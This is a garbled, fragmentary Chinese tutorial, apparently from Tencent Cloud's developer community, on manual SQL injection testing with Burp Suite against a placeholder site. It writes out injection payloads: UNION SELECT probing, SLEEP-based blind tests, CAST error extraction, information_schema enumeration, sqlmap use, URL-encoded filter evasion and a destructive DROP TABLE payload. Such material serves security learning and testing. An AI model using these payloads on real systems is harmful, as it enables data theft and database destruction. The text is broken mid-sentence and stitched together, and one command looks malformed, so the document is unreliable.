
127.0.0.1:8080(Burp 默认端口)。'或特殊字符(如", ;--),观察响应:MySQL server version),可能存在注入。' UNION SELECT 1,2,3--+)。UNION SELECT列数,直到响应正常:http
http://example.com?id=1 UNION SELECT 1,2,3--+
2、3),说明存在注入。id=1),点击 **Add §** 标记 payload 位置。IF(1=1, SLEEP(5), 0)。http://example.com?id=1 AND 1=CAST((SELECT version()) AS NCHAR(100))
5.7.38),说明注入成功。root@localhost(当前用户)、test_db(数据库名)。1 UNION SELECT 1,table_name,3 FROM information_schema.tables WHERE table_schema='test_db' LIMIT 0,1--+--sqlmap参数:bash
curl 'http://example.com?id=1' -H "Cookie: session=123" | sqlmap -r - --dbs%2527代替')。id=1%27%20UNION%20SELECT%201,2,3--+。; DROP TABLE users--+等语句,观察是否执行成功(需谨慎操作!)。原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。